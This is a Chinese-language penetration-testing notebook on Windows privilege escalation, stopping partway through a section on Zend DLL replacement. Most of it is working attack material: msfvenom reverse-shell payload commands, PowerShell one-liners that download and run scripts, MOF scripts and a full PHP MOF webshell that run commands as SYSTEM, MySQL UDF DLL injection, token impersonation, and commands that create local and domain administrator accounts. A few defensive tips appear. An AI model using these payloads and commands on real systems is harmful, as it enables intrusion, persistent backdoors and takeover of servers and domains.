郑重声明:
本笔记编写目的只用于安全知识提升,并与更多人共享安全知识,切勿使用笔记中的技术进行违法活动,利用笔记中的技术造成的后果与作者本人无关。倡导维护网络安全人人有责,共同维护网络文明和谐。

Windows 提权

  • 1 利用漏洞提权
    • 1.1 手工查找系统缺失补丁
    • 1.2 Windows 补丁审计工具
      • 1.2.1 Windows-Exploit-Suggester
      • 1.2.2 Sherlock
    • 1.3 MSF 模块查找可利用漏洞
  • 2 利用 Windows 配置错误提权
    • 2.1 系统服务权限配置错误
      • 2.1.1 利用 PowerUp 进行本地提权:
      • 2.1.2 MSF 中的 service_permissions 提权
    • 2.2 注册表键 AlwaysInstallElevated
    • 2.3 可信任服务路径漏洞
    • 2.4 自动安装配置文件
  • 3 组策略首选项提权分析及防范
    • 3.1 利用组策略批量修改域中机器本地管理员密码
    • 3.2 获取组策略的凭据
    • 3.3 防御组策略首选项提权
  • 4 绕过 UAC 提权
    • 4.1 获取 system 账号权限:
    • 4.2 绕过 UAC 限制方式
  • 5 使用 tokens 攻击域控制器
    • 5.1 Tokens 攻击过程
  • 6 Windows 服务器提权
    • 6.1 IIS 中的权限简介
      • 6.1.1 IIS 特性
      • 6.1.2 IIS 中的权限
    • 6.2 Windws 服务器溢出提权
      • 6.2.1 利用前提
      • 6.2.2 EXP 利用
        • 6.2.2.1 ASP webshell
        • 6.2.2.2 ASPX webshell
    • 6.3 WinServer 2008 溢出提权
      • 6.3.1 利用前提
      • 6.3.2 EXP 利用
    • 6.4 SQLServer 提权
      • 6.4.1 通过 webshell 查找可能存在用户信息的文件
      • 6.4.2 连接 MSsql 数据库
      • 6.4.3 命令执行
    • 6.5 DLL 劫持提权
      • 6.5.1 DLL 劫持提权原理
        • 6.5.1.1 Windows 的资源共享机制
        • 6.5.1.2 DLL 劫持
        • 6.5.1.3 DLL 劫持实现
      • 6.5.2 LPK.DLL 劫持提权
        • 6.5.2.1 生成 LPK.DLL 模块
        • 6.5.2.2 利用 LPK.DLL 模块提权
    • 6.6 MOF 提权
      • 6.6.1 MOF 介绍
      • 6.6.2 MOF 提权的原理
      • 6.6.3 利用过程
        • 6.6.3.1 修改 MOF 文件并上传
        • 6.6.3.2 利用 MOF 文件
      • 6.6.4 利用 mof.php 直接提权
        • 6.6.4.1 webshell
        • 6.6.4.2 执行 Payload
  • 7 MYSQL UDF提权
    • 7.1 什么是 UDF
    • 7.2 利用方式
  • 8 zend 提权
    • 8.1 利用原理
    • 8.2 利用过程:建立远控
      • 8.2.1 查找 `ZendExtensionManager.dll` 文件目录
      • 8.2.2 生成恶意文件
      • 8.2.3 利用恶意文件
    • 8.3 利用过程:执行恶意软件
      • 8.3.1 查找 `ZendExtensionManager.dll` 文件目录
      • 8.2.2 生成恶意文件
      • 8.2.3 利用恶意文件
      • 8.2.4 使用 Kali 制作后门软件
  • 9 FileZilla 提权
    • 9.1 利用原理
    • 9.2 利用过程
      • 9.2.1 查看敏感文件
      • 9.2.2 配置端口转发
      • 9.2.3 创建 ftp user 并分配权限
      • 9.2.4 创建 shift 后门
      • 9.2.5 测试后门
  • 10 MSF 中 Windows 提权完整流程
    • 10.1 MSF 中 windows 提权模块
    • 10.2 利用 MSF 生成反向 shell payload
    • 10.3 本地开启监听
    • 10.4 上传 Payload
    • 10.5 提权
      • 10.5.1 使用 getsystem 提权
      • 10.5.2 使用模块进行提权
      • 10.5.3 migrate 注入进程
    • 10.6 持久后门
      • 10.6.1 增加管理员run exploit/windows/local/persistence
      • 10.6.2 persistence 后门

前提:已经登录到目标系统的服务器上,但是得到的是一个低权限用户,进行提权,最终达到全面控制目标系统

user-->administrator-->system(他们的权限之间是有交集,不是完全包含,user 被 administrator 包含)
当获得 user 提权为 administrator
当获得 administrator 提权为system生成个木马
msfvenom -a x86 --platform windows -p windows/x86/shell/reverse_tcp LHOST=192.168.0.2 -b '\x00' -f exe -o evil.exe
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.0.2 lport=4444 -a x64 -f exe > Desktop/evil.exe

1 利用漏洞提权

1.1 手工查找系统缺失补丁

  1. 确认当前系统权限

    • whoami /groups
      • Mandatory Label\Medium Mandatory Level:标准用户
      • Mandatory Label\High Mandatory Level:管理员用户

    image-20211019220828775

  2. 查找当前系统安装过的补丁

    • wmic qfe get

    • systeminfo

      image-20211019221758750

1.2 Windows 补丁审计工具

1.2.1 Windows-Exploit-Suggester

AonCyberLabs/Windows-Exploit-Suggester: This tool compares a targets patch levels against the Microsoft vulnerability database in order to detect potential missing patches on the target. It also notifies the user if there are public exploits and Metasploit modules available for the missing bulletins. (github.com)

SecWiki/windows-kernel-exploits: windows-kernel-exploits Windows平台提权漏洞集合 (github.com)

利用前提

  • python2 环境
# 安装 xlrd 库
pip2 install xlrd --upgrade# update the database
./windows-exploit-suggester.py -u# 导出靶机系统信息到本地
systeminfo > systeminfo.txt# 查找可以利用的漏洞
./windows-exploit-suggester.py --database 2021-07-18-mssb.xls --systeminfo systeminfo.txt# 查找可以利用本地提权的漏洞
./windows-exploit-suggester.py -a -l --database 2021-07-18-mssb.xls --systeminfo systeminfo.txt# 如果没有打补丁,就会显示可以利用的 ms 编号、 exp 的地址和描述

1.2.2 Sherlock

rasta-mouse/Sherlock: PowerShell script to quickly find missing software patches for local privilege escalation vulnerabilities. (github.com)

import-module .\Sherlock.ps1
Find-AllVulns

image-20211019231550722

1.3 MSF 模块查找可利用漏洞

post/multi/recon/local_exploit_suggester

2 利用 Windows 配置错误提权

2.1 系统服务权限配置错误

  1. 服务未运行:利用任意服务替换原来的服务,然后重启服务。
  2. 服务正运行且无法终止:利用 DLL 劫持技术并尝试重启服务来提权。

2.1.1 利用 PowerUp 进行本地提权:

# 下载到本地后执行
powershell.exe -exec bypass -Command "& {Import-Module .\PowerUp.ps1; Invoke-AllChecks}"
powershell -nop -exec bypass -c “IEX (New-Object Net.WebClient).DownloadString('c:/PowerUp.ps1');Invoke-AllChecks”# 远程下载执行
powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1'); Invoke-AllChecks"

image-20211102105553200

如图说了利用Install-ServiceBinary模块,通过Write-ServiceBinary编写一个c#服务来添加一个用户

powershell -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('./PowerUp.ps1');Install-ServiceBinary -ServiceName 'rpcapd' -UserName test -Password test

“Everyone” 用户对这个文件有完全控制权,就是说所有用户都具有全部权限修改这个文件夹。

2.1.2 MSF 中的 service_permissions 提权

MSF 中对应的模块为: exploit/windows/local/service_permissions

image-20211102111001254

2.2 注册表键 AlwaysInstallElevated

注册表键 AlwaysInstallElevated 是一个策略设置项。Windows 允许低权限用户以 System 权限运行安装文件。如果启用此策略设置项,那么任何权限用户都能以 NT AUTHORITY\SYSTEM 权限来安装恶意的 MSI(Microsoft Windows Installer) 文件。

# 开启 AlwaysInstallElevated 功能
打开 gpedit.msc,组策略-计算机配置-管理模板-Windows 组件-Windows Installer-永远以高特权进行安装:选择启用
打开 gpedit.msc,组策略-用户配置-管理模板-Windows 组件-Windows Installer-永远以高特权进行安装:选择启用# CMD 下开启 AlwaysInstallElevated 功能
reg add HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated /t REG_DWORD /d 1
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated /t REG_DWORD /d 1
  • 利用 PowerUP 的 Get-RegAlwaysInstallElevated 模块来检查注册表键是否被设置。
powershell -nop -exec bypass -c “IEX (New-Object Net.WebClient).DownloadString('c:/PowerUp.ps1');Get-RegAlwaysInstallElevated”

image-20211102112506430

  • 添加账户:利用 Write-UserAddMSI 模块,生成 MSI 文件。再以普通用户权限运行 UserAdd.msi,添加一个管理员账户

image-20211102113536603

image-20211102113603726

  • MSF 中对应的模块为:exploit/windows/local/always_install_elevated
  • 防御:只要禁用注册表键 AlwaysInstallElevated,就可以阻止攻击者通过 MSI 文件进行提权。

2.3 可信任服务路径漏洞

windows服务通常都是以 System 权限运行的,所以系统在解析服务所对应的文件路径中的空格时,也会以系统权限进行解析。如果一个被恶意命名的执行程序被上传到受影响的目录中,服务一旦重启,就有机会进行权限提升为 System 权限。

例如,有如下的文件路径:
C:\Program Files\Some Folder\Service.exe
对于上面文件路径中的每一个空格,windows 都会尝试寻找并执行名字与空格前的名字向匹配的程序。操作系统会对文件路径中空格的所有可能进行尝试,直到找到一个匹配的程序。以上面的例子为例,windows会依次尝试确定和执行下面的程序:
C:\Program.exe
C:\Program Files\Some.exe
C:\Program Files\Some Folder\Service.exe
  • 检测目标机器是否存在可信服务路径漏洞

    # 使用 wmic 列出没有被引号所引起来的服务路径
    wmic service get name,displayname,pathname,startmode|findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr/i /v """
    
  • 检查存在漏洞的目录是否有写入的权限

    利用 Windows内建工具:icacls,下面我们用这个工具依次来检查“C:\Program Files”、“C:\Program Files\Common Files”、“C:\Program Files\Common Files\microsoftshared”等目录的权限。参数说明:
    “Everyone”用户对这个文件有完全控制权,就是说所有用户都具有全部权限修改这个文件夹。
    “M”表示修改
    “F”代表完全控制
    “CI”代表从属容器将继承访问控制项
    “OI”代表从属文件将继承访问控制项。Everyone:(OI)(CI)(F)意味着对该目录有读,写,删除其下的文件,删除其子目录的权限。
    

    img

  • 利用漏洞:将要上传的程序重命名并放置在存在此漏洞且可写的目录下,并尝试重启服务进行提权。

  • MSF 对应模块:exploit/windows/local/unquoted_service_path

2.4 自动安装配置文件

网络管理员在内网中给多台计算器配置同一个环境时,通常会使用脚本化批量部署的方法,这个过程就会使用安装配置文件。这些文件中包含的安装配置信息,其中还可以包含管理员账号密码等。

# 搜索Unattend.xml文件
dir /b /s c:\Unattend.xml# MSF 中对应模块
post/windows/gather/enum_unattend

3 组策略首选项提权分析及防范

SYSVOL 是活动目录里面的一个用于存储公共文件服务副本的共享文件夹,在域中的所有域控制器之间进行复制。SYSVOL 文件夹是在安装活动目录时自动创建的,主要用来存放登录脚本、组策略数据及其他域控制器需要的域信息等。SYSVOL 在所有经过身份验证的域用户或者域信任用户具有读权限的活动目录的域范围内共享。整个 SYSVO L目录在所有的域控制器中是自动同步和共享的,所有的域策略均存放在 C:\Windows\SYSVOL\DOMAIN\Policies 目录中。

常见的组策略首选项(GPP)

  • 映射驱动器(Drives.xml)
  • 创建本地用户
  • 数据源(DataSources.xml)
  • 打印机配置(Printers.xml)
  • 创建/更新服务(Services.xml)
  • 计划任务(ScheduledTasks.xml)

3.1 利用组策略批量修改域中机器本地管理员密码

组策略管理-林:test.lab-域-test.lab-右键:Default Domain Policy
组策略编辑器-计算机配置-首选项-控制面板设置-本地用户和组
本地用户和组-右键:新建-本地用户-配置如下图将 Domain Computer 组添加到验证组策略对象列表中,将新建的组策略应用到域中所有的非域控制器中手动更新组策略的更新信息
C:\Users\administrator>gpupdate

image-20211102223620685

image-20211102224406033

3.2 获取组策略的凭据

管理员在域中新建一个组策略后,操作系统会自动在SYSVOL共享目录中生成一个XML文件,该文件中保存了该组策略更新后的密码。该密码使用了AES-256加密算法,安全性比较高。但是微软在网站上公布过这个算法的私钥,任何域用户和域信任的用户均可对该共享目标进行访问,任何用户都可以访问保存在XML文件中的密码并将其解密,从而控制域中所有使用该账户/密码的本地管理员计算机。

# 手动查找 cpassword
\\test.lab\SYSVOL\test.lab\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups
python Gpprefdecrypt.py A48HwlVXS/3M2Asazld/dz+ATwKowJVcVhIM67sfhO8# PowerSploit
Import-Module .\PowerSploit.psd1
Get-GPPPassword# MSF 
利用 post/windows/gather/credentials/gpp 模块进行自动查找# 其他组策略首选项中可选的 cpassword 属性
Services\Services.xml
ScheduledTasks\ScheduledTasks.xml
Printers\Printers.xml
Drives\Drives.xml
DataSources\DataSources.xml

image-20211102224850160

image-20211102223651650

3.3 防御组策略首选项提权

  • 设置共享文件夹的 SYSVOL 的访问权限
  • 将包含组策略密码的 XML 文件从 SYSVOL 目录中删除
  • 不要将密码放在所有域用户都有权限访问的文件中
  • 建议使用 LAPS 进行更改域中机器的本地管理员密码

4 绕过 UAC 提权

4.1 获取 system 账号权限:

  • 提权失败,一般是由于 UAC 限制

image-20211103095848604

4.2 绕过 UAC 限制方式

# 通过不停的弹出UAC窗口,让没有安全意识的人选择yes。
use exploit/windows/local/ask
set filename update.exe
set session 1# 在用户不知情的情况下关闭 UAC
use exploit/windows/local/bypassuac# bypassuac_injection
use exploit/windows/local/bypassuac_injection
set target 1
set payload windows/x64/meterpreter/reverse_tcp
# 64 位的只能用 64 位的 payload,使用 86 的会报错
[-] Exploit aborted due to failure: bad-config: x86 Target Selected for x64 System

5 使用 tokens 攻击域控制器

令牌(Token) 就是系统的临时密钥,相当于账号和密码,用于决定是否允许这次请求及判断当前请求是属于哪一个用户的。它允许你在不提供密码或其他凭证的前提下,访问网络和系统资源。这些令牌将持续存在于系统中,除非系统重新启动。令牌最大的特点就是随机性和不可预测性,一般的攻击无法将令牌猜测出来。tokens 攻击的核心是 Kerberos 协议。

Kerberos工作机制

客户端请求证书的过程如下所示。

  • 客户端向认证服务器(AS)发送请求,要求得到服务器的证书。
  • AS收到请求后,将包含客户端密钥的加密证书响应发送给客户端。该证书包括服务器ticket (包括服务器密钥加密的客户机身份和一份会话密钥)和一个临时加密密钥(又称为会话密钥,session key) 。当然,认证服务器也会给服务器发送一份该证书,使服务器可以认证登录客户端的身份。
  • 客户端将ticket传到服务器上,如果服务器确认该客户端身份,便允许它登录服务器。
  • 客户端登录成功后,攻击者就可以通过入侵服务器获取客户端的令牌。
  • 用户每次登录,账号绑定临时的tokens,访问资源时提交 tokens 进行身份验证,类似于 web cookies。delegate tokens 账号注销后变为 Impersonate Token,权限依然有效(delegate tokens:交互登录会话,impersonate tokens:非交互登录会话)。

5.1 Tokens 攻击过程

  1. tokens 攻击需要拥有目标主机的 getsystem 权限,本地普通权限用户需要先取得本地权限

  2. 加载模块,并查看当前主机中的 tokens

    load incognito
    list_tokens -u
    
  3. 域管理员没有登陆目标设备时

    域管理员没有登陆目标设备时

  4. 通过域控制器访问共享目录,创建一个Token:\\192.168.10.22\C$

    image-20211104100957872

  5. 窃取 Token: impersonate_token LAB\\administrator

    image-20211104101038096

  6. 使用 LAB\administrator 用户开启 CMD:execute -f cmd.exe -i -t (-i,直接进入cmd,执行交互; -t:使用当前假冒tokens执行程序)

    image-20211104101043426

  7. 添加域管理员

    net user admin1 Admin123 /ad /domain
    net group "domain admins" admin1 /ad /domain
    

6 Windows 服务器提权

6.1 IIS 中的权限简介

在渗透测试中 ,我们获取的权限是 iis_user 用户组 ,要更高的权限就需要把当前的用户提权到系统用户或超级管理员用户组。更高的权限方便我们在后续的渗透中,扩大范围测试。

6.1.1 IIS 特性

  • IIS 中默认文件上传大小不能超过 200k, 否则会报错。

6.1.2 IIS 中的权限

Windows 中 权限大小为:aspx->php=>asp

  • aspx 默认能执行终端命令;

  • php 和 asp 在 wscript.shell 命令行执行组件没有删除的情况下,可以通过上传 cmd 到可执行目录,执行终端命令。

    image-20210711151937220

6.2 Windws 服务器溢出提权

利用 F4ck 的 pe.asp 进行 Windws 溢出提权

6.2.1 利用前提

  1. 目标主机存在 webshell 并且可以执行终端命令
  2. 上传溢出 EXP:IIS6.0-pe-exp.exe
  3. 执行命令

6.2.2 EXP 利用

6.2.2.1 ASP webshell

webshell.asp,密码:F4ck

  1. 访问webshell.asp,上传 cmd.exe 到可执行目录下如:C:\RECYCLER\

    image-20210711153628988

  2. 测试执行 cmd 命令

    image-20210711153840187

  3. 上传溢出 EXP 到可执行目录:IIS6.0-pe-exp.exe(注意 IIS 中默认文件上传大小不能超过 200k,超过要以其他方式进行上传。)

  4. 利用 EXP 提权:

    C:\RECYCLER\IIS6.0-pe-exp.exe "net user test 123456 /add & net localgroup administrators test /add"
    

    image-20210711154449964

    image-20210711154912417

6.2.2.2 ASPX webshell

webshell.aspx,密码:admin

  1. 访问 webshell.aspx,点击 Cmd Shell, 测试执行系统命令

    image-20210711184929880

    当拥有更大的权限时,还可以点击 IIS Spy 查看 IIS_USER 与 IIS_PASS

  2. 上传 EXP 文件到可执行目录::IIS6.0-pe-exp.exe

    image-20210711185837595

  3. 利用 EXP 提权:

    /c c:/recycler/IIS6.0-pe-exp.exe whoami
    

    image-20210711190149306

6.3 WinServer 2008 溢出提权

6.3.1 利用前提

  1. 目标主机存在 WebShell:webshell.aspx
  2. 在 WinServer 2008 R2 中 服务器默认是支持 aspx 的。aspx 默认能执行终端命令。
  3. 上传溢出 EXP:CVE-2014-4113-Exploit
  4. 执行命令

6.3.2 EXP 利用

webshell.aspx,密码:admin

  1. 访问 webshell.aspx,点击 Cmd Shell, 查看当前系统与所对应的权限

    whoami
    systeminfo
    
  2. 在 File Manager 中上传 EXP 文件到可执行目录::CVE-2014-4113-Exploit

    可以通过访问上传 getexecutedir.aspx 文件,查找可执行目录

    c:\inetpub\wwwroot\pe.lab.com
    
  3. 利用 EXP 提权:

    在 CmdShell 标签中执行

    /c c:\inetpub\wwwroot\target_sys.com\Win64.exe whoami
    

6.4 SQLServer 提权

如果网站里面使用的数据库是 sqlserver,那么如果找到 sa 的密码,利用提权脚本,执行命令。

注:获得的可能是普通用户权限,此时还需要配合其他方式如:溢出 exp 进行提权。

6.4.1 通过 webshell 查找可能存在用户信息的文件

webshell.aspx,密码:admin

  • web.config
  • config.asp
  • conn.aspx
  • database.aspx
  • index.apsx

image-20210711201935815

6.4.2 连接 MSsql 数据库

server=localhost,1433;UID=sa;PWD=123456;database=master

image-20210711202107498

6.4.3 命令执行

# 命令执行示例:
# xp_cmdshell
Exec master.dbo.xp_cmdshell 'whoami'
Exec master.dbo.xp_cmdshell 'net user test 123456 /add & net localgroup administrators test /add'
Exec master.dbo.xp_cmdshell 'systeminfo'
# sp_oacreate
Exec sp_configure 'show advanced options',1;RECONFIGURE;exec sp_configure 'Ad Hoc Distributed Queries',1;RECONFIGURE;

image-20210711202330938

image-20210711202429355

可以得知当前权限为 network service 普通用户,拥有基础命令操作,可以配合溢出提权进行提权操作。

6.5 DLL 劫持提权

6.5.1 DLL 劫持提权原理

6.5.1.1 Windows 的资源共享机制

  • windows 2000 之前,微软建议多个应用程序共享的任何模块应该放在 C:\Windows 的系统目录中,如:Kernel32.dll。
  • windows 2000 之后,微软建议应用程序将所有文件放到自己的目录并强制系统的加载程序首先从应用程序目录中加载模块,并只有当加载模块无法在应用程序目录中找到,才搜索其他目录。利用此特性,可以使应用程序强制加载指定的 DLL 文件,从而实现 DLL 劫持。

6.5.1.2 DLL 劫持

Windows 的资源共享机制,即操作系统加载程序首先从应用程序目录中加载模块特性,在注册表中也有体现:

  • HKLM\System\CurrentControlSet\Control\Session Manager\SafeDllSearchMode
    • 如果为1:搜索顺序为:应用程序所在目录 -> 系统目录(用 GetSystemDirectory 获取) -> 16 位系统目录 -> Windows 目录(用 GetWindowsDirectory 获取) -> 运行程序的当前目录 -> PATH环境变量,
    • 如果为0:搜索顺序为:应用程序所在目录 -> 运行程序的当前目录 -> 系统目录(用 GetSystemDirectory 获取) -> 16 位系统目录 -> Windows 目录(用 GetWindowsDirectory 获取) -> PATH 环境变量。
    • Windows Server 2003 默认值为 1,Windows XP/2000 默认值为 0 或者没有这个键值。但是不管是哪种情况,第一个搜索的肯定是应用程序的所在目录,这样就有机会让应用程序去加载我们的 DLL。如果这个 DLL 和系统目录下的某个 DLL 同名,导出表也相同,功能就是加载系统目录下的那个 DLL,并且将导出表转发到那个真实的 DLL。这时DLL劫持就发生了。可以看出,构造一个符合上面要求的 DLL,再将其放在可执行文件的目录即可轻松实现 DLL劫持了。

6.5.1.3 DLL 劫持实现

以劫持 LPK.DLL 文件为例:通过编程来实现一个 LPK.DLL 文件,它与系统目录下的 LPK.DLL 导出表相同,并能加载系统目录下的 LPK.DLL ,并且能将导出表转发到真实的 LPK.DLL 。可以看出我们要实现的这个 DLL 需求如下:
1、构造一个与系统目录下 LPK.DLL 一样的导出表;
2、加载系统目录下的 LPK.DLL;
3、将导出函数转发到系统目录下的 LPK.DLL 上;
4、在初始化函数中加入我们要执行的代码。

6.5.2 LPK.DLL 劫持提权

利用工具:T00ls Lpk Sethc v4

6.5.2.1 生成 LPK.DLL 模块

  • 设备热键值为:A(65)、B(66)
  • 启动密码:123456
  • 其余默认
  • 点击生成 LPK.DLL 模块

6.5.2.2 利用 LPK.DLL 模块提权

将 LPK.DLL 模块放到开机启动的程序目录下(该程序需要调用 LPK.DLL 模块),当用户重启设备时,可劫持 LPK.DLL 模块。

  • 通过 mstsc 远程连接目标主机

  • 先按 shift 键五次弹出粘滞键窗口

  • 再同时按设置的热键 Ctrl a 和 b 就会弹出后门

    image-20210712103535096

  • 输入密码:123456

    image-20210712103640167

  • 执行命令。

    image-20210712103739018

6.6 MOF 提权

6.6.1 MOF 介绍

托管对象格式 (MOF) 文件是创建和注册提供程序、事件类别和事件的简便方法。在 MOF 文件中创建类实例和类定义后,可以对该文件进行编译。编译 MOF 文件将在 CIM 储存库中注册所有的类定义和实例。之后,提供程序、事件类别和事件信息便可由 WMI 和 Visual Studio Analyzer 使用。

6.6.2 MOF 提权的原理

MOF 是 Windows 系统的一个文件(在 C:/windows/system32/wbem/mof/nullevt.mof)叫做"托管对象格式"其作用是每隔五秒就会去监控进程创建和死亡。拥有了 MySQL 的 root 权限后,将改写的 mof 文件上传,这个文件会被服务器每隔 5 秒以 system 权限执行。这个改写的 mof 有一段是 vbs 脚本,这个 vbs 大多数是 cmd 的添加管理员用户的命令。

6.6.3 利用过程

需要 mysql 对 C:/windows/system32/wbem/mof 文件夹具有写的权限。

6.6.3.1 修改 MOF 文件并上传

#pragma namespace("\\\\.\\root\\subscription") instance of __EventFilter as $EventFilter 
{ EventNamespace = "Root\\Cimv2"; Name  = "filtP2"; Query = "Select * From __InstanceModificationEvent " "Where TargetInstance Isa \"Win32_LocalTime\" " "And TargetInstance.Second = 5"; QueryLanguage = "WQL"; 
}; instance of ActiveScriptEventConsumer as $Consumer 
{ Name = "consPCSV2"; ScriptingEngine = "JScript"; ScriptText = "var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user test 123456 /add && net localgroup administrators test /add \")"; 
}; instance of __FilterToConsumerBinding 
{ Consumer   = $Consumer; Filter = $EventFilter; 
}; 

上传 evil.mof 到可执行目录

C:\Documents and Settings\All Users\Application Data\evil.mof

6.6.3.2 利用 MOF 文件

使用 sql 语句将系统当中默认的 nullevt.mof 给替换掉。进而让系统执行我们这个恶意的 mof 文件。

select load_file('C:\Documents and Settings\All Users\Application Data\evil.mof') into dumpfile 'c:/windows/system32/wbem/mof/nullevt.mof';

等待系统执行恶意的 mof 文件后,可以看到系统创建了 test 用户,权限为 administrators 组

6.6.4 利用 mof.php 直接提权

6.6.4.1 webshell

上传以下文件并访问 mof.php 文件

<?php 
$path="c:/ini.txt"; 
session_start(); 
if(!empty($_POST['submit'])){ 
setcookie("connect"); 
setcookie("connect[host]",$_POST['host']); 
setcookie("connect[user]",$_POST['user']); 
setcookie("connect[pass]",$_POST['pass']); 
setcookie("connect[dbname]",$_POST['dbname']); 
echo "<script>location.href='?action=connect'</script>"; 
} 
if(empty($_GET["action"])){ 
?> <html> 
<head><title>Win MOF Shell</title></head> 
<body> 
<form action="?action=connect" method="post"> 
Host: 
<input type="text" name="host" value="192.168.1.123:3306"><br/> 
User: 
<input type="text" name="user" value="root"><br/> 
Pass: 
<input type="password" name="pass" value="toor"><br/> 
DB:   
<input type="text" name="dbname" value="mysql"><br/> 
<input type="submit" name="submit" value="Submit"><br/> 
</form> 
</body> 
</html> <?php 
exit; 
} 
if ($_GET[action]=='connect') 
{ 
$conn=mysql_connect($_COOKIE["connect"]["host"],$_COOKIE["connect"]["user"],$_COOKIE["connect"]["pass"])  or die('<pre>'.mysql_error().'</pre>'); 
echo "<form action='' method='post'>"; 
echo "Cmd:"; 
echo "<input type='text' name='cmd' value='$strCmd'?>"; 
echo "<br>"; 
echo "<br>"; 
echo "<input type='submit' value='Exploit'>"; 
echo "</form>"; 
echo "<form action='' method='post'>"; 
echo "<input type='hidden' name='flag' value='flag'>"; 
echo "<input type='submit'value=' Read  '>"; 
echo "</form>"; 
if (isset($_POST['cmd'])){ 
$strCmd=$_POST['cmd']; 
$cmdshell='cmd /c '.$strCmd.'>'.$path; 
$mofname="c:/windows/system32/wbem/mof/system.mof"; 
$payload = "#pragma namespace(\"\\\\\\\\\\\\\\\\.\\\\\\\\root\\\\\\\\subscription\") instance of __EventFilter as \$EventFilter 
{ EventNamespace = \"Root\\\\\\\\Cimv2\"; Name  = \"filtP2\"; Query = \"Select * From __InstanceModificationEvent \" \"Where TargetInstance Isa \\\\\"Win32_LocalTime\\\\\" \" \"And TargetInstance.Second = 5\"; QueryLanguage = \"WQL\"; 
}; instance of ActiveScriptEventConsumer as \$Consumer 
{ Name = \"consPCSV2\"; ScriptingEngine = \"JScript\"; ScriptText = \"var WSH = new ActiveXObject(\\\\\"WScript.Shell\\\\\")\\\\nWSH.run(\\\\\"$cmdshell\\\\\")\"; 
}; instance of __FilterToConsumerBinding 
{ Consumer = \$Consumer; Filter = \$EventFilter; 
};"; 
mysql_select_db($_COOKIE["connect"]["dbname"],$conn); 
$sql1="select '$payload' into dumpfile '$mofname';"; 
if(mysql_query($sql1)) echo "<hr>Execute Successful!<br> Please click the read button to check the  result!!<br>If the result is not correct,try read again later<br><hr>"; else die(mysql_error()); 
mysql_close($conn); 
} if(isset($_POST['flag'])) 
{ $conn=mysql_connect($_COOKIE["connect"]["host"],$_COOKIE["connect"]["user"],$_COOKIE["connect"]["pass"])  or die('<pre>'.mysql_error().'</pre>'); $sql2="select load_file(\"".$path."\");"; $result2=mysql_query($sql2); $num=mysql_num_rows($result2); while ($row = mysql_fetch_array($result2, MYSQL_NUM)) { echo "<hr/>"; echo '<pre>'. $row[0].'</pre>'; } mysql_close($conn); 
} 
} 
?>

6.6.4.2 执行 Payload

以 root 用户登陆,执行以下语句:

net.exe user test 123456 /add && net localgroup administrators test /add

7 MYSQL UDF提权

MySQL UDF提权执行系统命令_谢公子的博客-CSDN博客_udf提权

7.1 什么是 UDF

UDF (user defined function),即用户自定义函数。根据MySQL函数族的可扩展机制,意味着用户可以自己建立包含有自定义函数的动态库来创建自定义函数。

7.2 利用方式

原理:通过自定义库函数来实现执行任意的程序

前提: 在 mysql 库下必须有 func 表,并且在 ‑‑skip‑grant‑tables 开启的情况下,UDF 会被禁止;

利用途径: 通过获得的插件库路径,找对应操作系统的 udf 库文件,利用 udf 库文件加载函数并执行命令

# 查看  secure_file_priv  的值
show global variables like 'secure%';
`secure_file_priv`  参数的值不能动态更改,只能在 Mysql 的配置文件中修改,重启生效。- NULL :默认,表示限制 Mysql 不允许导入导出。 - /dir/ :表示限制 Mysql 的导入|导出只能发生在 /dir/ 目录下- 空值:表示不限制 Mysql  的导入|导出
# 若没有权限导出时报错如下:
# 需要在my.ini 的 [mysqld] 下添加:secure-file-priv=
The MySQL server is running with the --secure-file-priv option so it cannot execute this statement# 没有 plugin 文件夹时报错如下:
# 当 MySQL< 5.1 版本时,将 .dll 文件导入到 c:\windows 或者 c:\windows\system32 目录下。
# 当 MySQL> 5.1 版本时,将 .dll 文件导入到 C:\phpStudy\PHPTutorial\MySQL\lib\plugin\udf.dll 目录下 (lib\plugin目录默认不存在,需自行创建)。
Can't create/write to file 'C:\phpStudy\PHPTutorial\MySQL\lib\plugin\moonudf.dll' (Errcode: 2)# 获取插件库路径
mysql> show variables like "%plugin%";# 查看系统构架
mysql> show variables like "%compile%";# 找对应操作系统的 payload 库文件
可以去 kali 中/usr/share/metasploit-framework/data/exploits/mysql/ 下载对应的文件# 将dll文件写入 plugin 目录,并且创建函数
创建一个表并将二进制数据插入到十六进制编码流中。可以通过insert语句或将其分解为多个部分,然后使用 update 语句拼接二进制数据。
create table temp(data longblob);
insert into temp(data) values (0x4d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000f00000000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000000000000000000);
update temp set data = concat(data,0x33c2ede077a383b377a383b377a383b369f110b375a383b369f100b37da383b369f107b375a383b35065f8b374a383b377a382b35ba383b369f10ab376a383b369f116b375a383b369f111b376a383b369f112b376a383b35269636877a383b300000000000000000000000000000000504500006486060070b1834b00000000);
select data from temp into dumpfile "C:\phpStudy\PHPTutorial\MySQL\lib\plugin\udf.dll";# 创建函数 sys_eval
# 引入的函数是 sys_eval
# shared_library_name(共享包名称): udf.dll
create function sys_eval returns string soname 'udf.dll';
#查看创建的sys_eval函数
select * from mysql.func where name = 'sys_eval';# 使用系统命令
# 将 udf.dll 文件写入 plugin 目录后,便可以使用 sys_eval 函数
select sys_eval('whoami');

8 zend 提权

测试 php 版本 5.2.17

8.1 利用原理

Zend是 php 的引擎(虚拟机解释器)实现先编译再执行。安装 Zend 后,Zend 会自动配置目录权限,当C:\Program Files\Zend\ZendOptimizer-3.3.3\下的目录权限为 Everyone 全权,这导致入侵者能写入文件。如果 ZendExtensionManager.dll 权限可以修改,那就可以用其他恶意的 dll 文件替换 ZendExtensionManager.dll 文件。

当 iis6.0 在启动、回收进程重启启动的时,有人访问网站的时候就会加载 ZendExtensionManager.dll 文件

8.2 利用过程:建立远控

8.2.1 查找 ZendExtensionManager.dll 文件目录

上传查询目录读写信息的脚本文件,并访问该页面进行查询,确认靶机 ZendExtensionManager.dll 文件与目录具有可读可写权限

